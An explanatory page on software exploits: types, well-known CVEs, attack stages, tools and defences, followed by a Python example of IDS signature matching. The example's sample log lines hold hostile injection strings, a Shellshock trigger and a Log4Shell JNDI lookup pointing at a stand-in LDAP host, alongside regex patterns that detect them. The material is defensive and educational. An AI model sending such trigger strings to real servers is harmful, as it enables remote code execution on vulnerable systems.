Exploits: Weaknesses Weaponised
An exploit is a piece of code, technique, or tool used by attackers to take advantage of a vulnerability in a system. Exploits can target software, hardware, misconfigurations, or even social behaviours, and are often used to gain unauthorised access, escalate privileges, exfiltrate data, or disrupt operations.
💥 What Is an Exploit?
At its core, an exploit is the method used to trigger a vulnerability — it’s the practical weaponisation of a weakness. While vulnerabilities are the flaws, exploits are how those flaws are actively abused.
Types of vulnerabilities exploited include:
- Buffer overflows
- SQL injection flaws
- Cross-site scripting (XSS)
- Privilege escalation bugs
- Authentication bypasses
- Insecure deserialisation
🔍 Types of Exploits
| Type | Description |
|---|---|
| Remote Exploit | Launched over a network; the attacker does not need physical access (e.g. RCE). |
| Local Exploit | Requires existing access to the system; typically used to escalate privileges. |
| Zero-Day Exploit | Targets a vulnerability not yet known to the vendor or the public. |
| N-Day Exploit | Targets a known vulnerability that may not yet be patched on the target system. |
🧪 Examples of Real-World Exploits
- EternalBlue (CVE-2017-0144): Used by WannaCry ransomware to exploit SMBv1 on Windows.
- Log4Shell (CVE-2021-44228): Critical RCE in Log4j used to compromise Java applications.
- Shellshock (CVE-2014-6271): Bash bug allowing remote code execution on Unix systems.
- Heartbleed (CVE-2014-0160): Information leak from vulnerable OpenSSL versions.
⚙️ How Exploits Are Used
- Reconnaissance: Identify vulnerable targets.
- Weaponisation: Prepare a specific exploit payload.
- Delivery: Inject or deliver the payload (e.g. via phishing, HTTP, USB).
- Exploitation: Trigger the vulnerability.
- Installation/Persistence: Establish control (e.g. via a remote shell or malware).
🛠️ Common Exploitation Tools
- Metasploit Framework – A modular penetration testing toolkit.
- ExploitDB – Public archive of exploits and PoCs.
- Cobalt Strike – Advanced red team exploitation and post-exploitation toolkit.
- Nmap & NSE – Often used for detecting exploitable services.
🛡️ Defending Against Exploits
- Patch Management: Keep systems up to date with vendor patches.
- Vulnerability Management: Use tools like Qualys, Nessus, or OpenVAS to find and fix weaknesses.
- Intrusion Detection/Prevention Systems (IDS/IPS): Detect and block known exploit signatures.
- Web Application Firewalls (WAFs): Help prevent web-based exploitation attempts.
- Network Segmentation: Limit lateral movement opportunities after exploitation.
- Security Awareness: Reduce delivery vectors like phishing.
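To make the IDS/IPS point concrete, here is an added example (not from the original page) of the signature matching such a system performs, run over constructed HTTP access-log lines carrying the trigger strings of two exploits listed above, Shellshock and Log4Shell. The log format, the `scan_request_log` function and the sample lines are all assumptions made for this illustration.

```python
import re
from dataclasses import dataclass

# Classic indicators a signature-based IDS/WAF rule looks for in request
# lines and headers. Constructed for this example, not a production ruleset.
SIGNATURES = {
    "Shellshock CVE-2014-6271": re.compile(r"\(\)\s*\{"),
    "Log4Shell CVE-2021-44228": re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE),
}

@dataclass
class Alert:
    line_no: int
    rule: str
    field: str

def scan_request_log(lines):
    """Return one Alert per (line, rule) where a signature matches.

    Each line is expected as a simple 'src_ip "request" "user-agent"' record
    (an assumed format for this example).
    """
    alerts = []
    for n, line in enumerate(lines, start=1):
        # Attacker-controlled input arrives in the quoted fields: the request
        # line or a header such as User-Agent.
        fields = re.findall(r'"([^"]*)"', line)
        for rule, pattern in SIGNATURES.items():
            for i, field in enumerate(fields):
                if pattern.search(field):
                    alerts.append(Alert(n, rule, f"field{i}"))
                    break  # one alert per rule per line is enough
    return alerts

# Constructed sample lines: two benign requests and two carrying trigger strings.
SAMPLE_LOG = [
    '203.0.113.5 "GET /index.html HTTP/1.1" "Mozilla/5.0"',
    '203.0.113.9 "GET /cgi-bin/status HTTP/1.1" "() { :; }; echo test"',
    '198.51.100.2 "GET /login?user=${jndi:ldap://example.invalid/a} HTTP/1.1" "curl/8.0"',
    '198.51.100.7 "POST /api/v1/items HTTP/1.1" "python-requests/2.31"',
]

if __name__ == "__main__":
    for a in scan_request_log(SAMPLE_LOG):
        print(f"line {a.line_no}: {a.rule} matched in {a.field}")
```

Signature matching only catches the known form of each trigger string, which is why it is listed alongside patching rather than instead of it.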